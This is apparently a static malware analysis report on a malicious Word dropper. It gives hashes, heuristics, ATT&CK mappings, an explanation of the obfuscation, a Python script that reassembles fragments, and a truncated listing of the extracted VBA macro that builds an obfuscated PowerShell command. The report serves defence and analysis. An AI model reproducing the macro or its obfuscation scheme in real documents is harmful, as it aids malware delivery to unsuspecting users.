Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a52cc32b8836f3de…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 188.8 KB
Created: 2018-06-22 14:45:00 (OLE metadata timestamp; author-controlled, so not reliable for dating the campaign)
Authoring application: Microsoft Office Word
First seen: 2019-04-17
MD5: d5a3bd0fd687726e38f49730b7f186df
SHA-1: 6da32ba3730dd4896248f292353f834f5f057646
SHA-256: a52cc32b8836f3deb2b70df10782bb6bcefbbfc09b43de5936e344e9ca3811e1
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a malicious Word (OLE) document containing a VBA macro with an AutoOpen auto-execution entry point. The macro builds a PowerShell command out of short string fragments: each helper function concatenates two- and three-character literals and Chr(34) quote characters, interleaved with meaningless arithmetic on undefined variables (On Error Resume Next suppresses the resulting errors), so that no recognisable keyword appears as a contiguous string in the source. Reassembling the literals of the first two functions in the extracted listing in source order gives:

Hell " $(Set-ITEM  'vaRiAbLE:Ofs' '' ) " +[sTRing]('21}112}80t82e93K105v17N12N17Z95K84>70Z28>94}83v91v84v82>69N17w67K80!95N85N94t92}10!21!70}125>127}71N1...

The fragment starts mid-word, so at least one earlier fragment (very likely the interpreter name) comes from a function outside this order. The Set-ITEM 'vaRiAbLE:Ofs' '' subexpression clears PowerShell's $OFS (output field separator) so that a character array cast to [string] joins with no spaces, and the long run of numbers separated by non-digit characters is consistent with an encoded list of character codes; the code that splits, decodes and executes it lies in the truncated part of the listing, so the exact decoding step and any download URL cannot be recovered from this page. The mixed case (Set-ITEM, vaRiAbLE, sTRing) is case randomisation against keyword matching. The finished string is handed to Shell(), which launches the PowerShell process. The ClamAV Doc.Dropper.Agent detection listed under Heuristics and the shell/download tokens flagged in the compiled p-code are consistent with a dropper whose purpose is to download and execute a second-stage payload.
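The following Python script is an added example and not part of the analysis platform that produced this report. It reconstructs the fragment string above from the decoded macro source: it parses macros.bas assignments, skips the arithmetic padding lines, evaluates string concatenation and Chr() calls bottom-up, and joins each Function's return value in source order. The function names parse_assignments, eval_expr and reconstruct are mine, the embedded SAMPLE_VBA is the first two functions copied from the listing below (some padding lines dropped), and joining in source order is an assumption about the caller, which sits in the truncated part of the listing.

```python
"""Rebuild the string a junk-padded VBA macro assembles from literal fragments.

Added example for this report; not the analysis platform's own tooling.
"""
import re
from typing import Dict, List, Optional, Tuple

# Constructed input: two functions copied from the macros.bas listing in this
# report (some arithmetic padding lines omitted for brevity).
SAMPLE_VBA = r'''
Function zACHBCvvHB()
On Error Resume Next
hWNzqz = (RiWbA * 36703 + 19362 * CInt(TNfjjZ - CDbl(22560)) * 63829 * Oct(75613))
nTlPXnfMLao = "He" + "ll" + " " + Chr(34) + " $(" + "Se" + "t-" + "IT"
SEtzIo = (wdQNWo * 77292 + 3144 * CInt(LnEIin - CDbl(9201)) * 48438 * Oct(43533))
KKPlotEApX = "EM" + "  '" + "vaR" + "iA" + "bL" + "E:" + "Of"
jCXZtivnhc = "s'" + " ''" + " ) " + Chr(34) + " " + "+[s"
LmobTEqHl = "TRi" + "ng" + "]('" + "21}"
zACHBCvvHB = nTlPXnfMLao + KKPlotEApX + jCXZtivnhc + LmobTEqHl
awLwZ = (jXBvzN * 90379 + 11613 * CInt(sosNTR - CDbl(32882)) * 41028 * Oct(97761))
End Function
Function liEnumiOthB()
On Error Resume Next
AzaYq = (GFQhj * 78249 + 42631 * CInt(jfElY - CDbl(94747)) * 21110 * Oct(2741))
uRQzc = "11" + "2}" + "80" + "t8"
IiSLNEQ = "2e9" + "3K1" + "05v" + "17N" + "12" + "N17"
FlqprBBDOSk = "Z95" + "K84" + ">70" + "Z2" + "8>9" + "4}8" + "3v9"
AaYnaIIO = "1v8" + "4v" + "82" + ">6" + "9N"
EbbQJdhXDFC = "17w" + "67" + "K80" + "!95" + "N8" + "5N"
OwZUljdV = "94" + "t9" + "2}" + "10!"
fdYVnqDbtm = "21!" + "70" + "}12" + "5>1" + "27" + "}71" + "N1"
liEnumiOthB = uRQzc + IiSLNEQ + FlqprBBDOSk + AaYnaIIO + EbbQJdhXDFC + OwZUljdV + fdYVnqDbtm
End Function
'''

TOKEN_RE = re.compile(
    r'(?P<str>"(?:[^"]|"")*")'               # VBA string literal; "" escapes a quote
    r'|(?P<chr>Chr\(\s*(?P<code>\d+)\s*\))'  # Chr(n): one character by code
    r'|(?P<id>[A-Za-z_]\w*)'                 # variable or function reference
    r'|(?P<op>[+&])'                         # VBA string concatenation operators
    r'|(?P<other>\S)'                        # digits, parens, '*', '-': arithmetic noise
)
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
PROC_RE = re.compile(r'^\s*(?:Public\s+|Private\s+)?(?:Function|Sub)\s+(\w+)', re.I)


def parse_assignments(src: str) -> Tuple[Dict[str, str], List[str]]:
    """Return {lhs: rhs expression} for every assignment and procedure names in order.

    Identifiers in this family are random and unique, so one flat table suffices;
    a Function's return value is simply the assignment to its own name.
    """
    env: Dict[str, str] = {}
    order: List[str] = []
    for line in src.splitlines():
        proc = PROC_RE.match(line)
        if proc:
            order.append(proc.group(1))
            continue
        assign = ASSIGN_RE.match(line)
        if assign:
            env[assign.group(1)] = assign.group(2)
    return env, order


def eval_expr(expr: str, env: Dict[str, str], depth: int = 0) -> Optional[str]:
    """Evaluate a pure string-building expression; None if it is arithmetic padding."""
    if depth > 64:  # guard against self-referential junk
        return None
    parts: List[str] = []
    for tok in TOKEN_RE.finditer(expr):
        if tok.group('str'):
            parts.append(tok.group('str')[1:-1].replace('""', '"'))
        elif tok.group('chr'):
            parts.append(chr(int(tok.group('code'))))
        elif tok.group('id'):
            rhs = env.get(tok.group('id'))
            sub = eval_expr(rhs, env, depth + 1) if rhs is not None else None
            if sub is None:
                return None  # refers to an undefined or non-string variable
            parts.append(sub)
        elif tok.group('op'):
            continue
        else:
            return None  # any other token means this line is noise, not a string
    return ''.join(parts)


def reconstruct(src: str) -> str:
    """Join each Function's return string in definition order (assumed caller order)."""
    env, order = parse_assignments(src)
    pieces: List[str] = []
    for name in order:
        if name in env:
            value = eval_expr(env[name], env)
            if value is not None:
                pieces.append(value)
    return ''.join(pieces)


if __name__ == '__main__':
    print(reconstruct(SAMPLE_VBA))
```

Run it against the full macros.bas to recover the remaining fragments; if the output still reads out of order, locate the calling procedure in the listing and reorder the joined pieces to match its argument order instead of definition order.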

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6586652-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6586652-0
  • VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    The macro calls Shell(), the VBA primitive for launching an external process; in this sample it is what starts PowerShell with the assembled command line.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    An AutoOpen procedure runs as soon as the document is opened with macros enabled, so no interaction beyond enabling content is needed.
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this is the rule's generic description: for this sample a VBA project was in fact recovered (see the VBA macro findings above and the extracted macros.bas), so this marker only corroborates those findings.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    This is the standard DrawingML XML namespace identifier present in ordinary Office files; it is not a download location or an indicator of compromise and should not be blocklisted.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 26095 bytes
SHA-256: 25c5457b450b03ea0eec9d31b509abc1518ab0b3bf2e5c61dac4d8d73efe3058

Script preview (first 1,000 lines of the extracted macro source):
Attribute VB_Name = "SSFwsJuwMNlmzF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "pjucnCivuGkn"
Function zACHBCvvHB()
On Error Resume Next
hWNzqz = (RiWbA * 36703 + 19362 * CInt(TNfjjZ - CDbl(22560)) * 63829 * Oct(75613))
nTlPXnfMLao = "He" + "ll" + " " + Chr(34) + " $(" + "Se" + "t-" + "IT"
SEtzIo = (wdQNWo * 77292 + 3144 * CInt(LnEIin - CDbl(9201)) * 48438 * Oct(43533))
KKPlotEApX = "EM" + "  '" + "vaR" + "iA" + "bL" + "E:" + "Of"
aFJJV = (ZNYsJT * 41689 + 65171 * CInt(EptbzZ - CDbl(82596)) * 65711 * Oct(15609))
jCXZtivnhc = "s'" + " ''" + " ) " + Chr(34) + " " + "+[s"
YciHi = (UbIOcn * 39021 + 89997 * CInt(wbQJS - CDbl(84516)) * 34521 * Oct(43769))
LmobTEqHl = "TRi" + "ng" + "]('" + "21}"
zACHBCvvHB = nTlPXnfMLao + KKPlotEApX + jCXZtivnhc + LmobTEqHl
awLwZ = (jXBvzN * 90379 + 11613 * CInt(sosNTR - CDbl(32882)) * 41028 * Oct(97761))
End Function
Function liEnumiOthB()
On Error Resume Next
AzaYq = (GFQhj * 78249 + 42631 * CInt(jfElY - CDbl(94747)) * 21110 * Oct(2741))
uRQzc = "11" + "2}" + "80" + "t8"
WQdzE = (wJcMv * 47893 + 56724 * CInt(wLarH - CDbl(59242)) * 47242 * Oct(25208))
IiSLNEQ = "2e9" + "3K1" + "05v" + "17N" + "12" + "N17"
SrjnM = (wBszcE * 16018 + 24802 * CInt(BCTYD - CDbl(54575)) * 51940 * Oct(54925))
FlqprBBDOSk = "Z95" + "K84" + ">70" + "Z2" + "8>9" + "4}8" + "3v9"
XGawF = (WwJMK * 15462 + 46641 * CInt(kdfKD - CDbl(49364)) * 1212 * Oct(8060))
AaYnaIIO = "1v8" + "4v" + "82" + ">6" + "9N"
wDpFLA = (brOcQ * 11814 + 8862 * CInt(vocjuv - CDbl(4517)) * 27390 * Oct(56299))
EbbQJdhXDFC = "17w" + "67" + "K80" + "!95" + "N8" + "5N"
juXRXC = (TQcuQ * 97039 + 21482 * CInt(AlStvA - CDbl(57646)) * 48441 * Oct(64807))
OwZUljdV = "94" + "t9" + "2}" + "10!"
OzUJu = (pMTcFl * 19011 + 38062 * CInt(awpcD - CDbl(60833)) * 80532 * Oct(33561))
fdYVnqDbtm = "21!" + "70" + "}12" + "5>1" + "27" + "}71" + "N1"
liEnumiOthB = uRQzc + IiSLNEQ + FlqprBBDOSk + AaYnaIIO + EbbQJdhXDFC + OwZUljdV + fdYVnqDbtm
uKjUhl = (VqCJF * 66489 + 18475 * CInt(jEDfi - CDbl(82531)) * 28029 * Oct(52574))
End Function
Function anEpCHJW()
On Error Resume Next
hVDowi = (YfkPkM * 39927 + 58891 * CInt(WjvHKF - CDbl(83728)) * 75645 * Oct(37733))
LKjuzf = "07" + "N1" + "7e1" + "2>1"
wcKitf = (knMiQY * 23199 + 36785 * CInt(awulTk - CDbl(47782)) * 94615 * Oct(23117))
PcizJBQOzi = "7t" + "95" + "v8" + "4w"
TUobd = (UAfHO * 94443 + 82978 * CInt(BchRzG - CDbl(21883)) * 68148 * Oct(77295))
XlQwjVLUNX = "70N" + "28N" + "94K" + "83"
ftshcO = (NWmMP * 92244 + 22297 * CInt(SwXjLV - CDbl(56027)) * 13824 * Oct(22136))
KDwGwZ = "Z9" + "1!8" + "4t8" + "2e"
rCGzGv = (fNvkXn * 47000 + 32300 * CInt(AaEWm - CDbl(62058)) * 42127 * Oct(66927))
KaptFt = "69" + "!17" + ">98"
JnCcEC = (hwkLwP * 31670 + 81953 * CInt(jiPwvJ - CDbl(98807)) * 30701 * Oct(15200))
GaWmziBwz = "t7" + "2e6" + "6K6"
CCpwL = (YQwHjD * 17380 + 87371 * CInt(pqnEHk - CDbl(19568)) * 27635 * Oct(86532))
FRjvq = "9t" + "84" + "Z92" + "K31" + "!1"
anEpCHJW = LKjuzf + PcizJBQOzi + XlQwjVLUNX + KDwGwZ + KaptFt + GaWmziBwz + FRjvq
wGkmA = (mUjAjr * 96427 + 49393 * CInt(YzUiwf - CDbl(48516)) * 42643 * Oct(322))
End Function
Function RtmmjB()
On Error Resume Next
TLKAl = (nwvNan * 58179 + 91547 * CInt(ujZtO - CDbl(96193)) * 84545 * Oct(26680))
nPSMO = "27" + "!84" + ">6" + "9K" + "31"
jkpfw = (Ykkjh * 54526 + 53360 * CInt(wHvvC - CDbl(24020)) * 8648 * Oct(69631))
qYGSEzcjXH = "}10" + "2t" + "84" + "}83" + "v11" + "4}" + "93"
YOCwz = (lHbzkQ * 308 + 4648 * CInt(zYoqD - CDbl(94741)) * 27140 * Oct(83581))
zOhqF = "}8" + "8K" + "84e"
OblSC = (BVzPRQ * 89840 + 50996 * CInt(HwZGi - CDbl(82243)) * 6264 * Oct(96124))
VYWouLhEEo = "95" + "v6" + "9>1" + "0e2" + "1w" + "102" + "e1"
RtmmjB = nPSMO + qYGSEzcjXH + zOhqF + VYWouLhEEo
nwdYO = (YKXjhX * 83018 + 36321 * CInt(lwPRk - CDbl(71479)) * 82991 * Oct(9318))
End Function
Function LuFSFzo()
On 
... (truncated)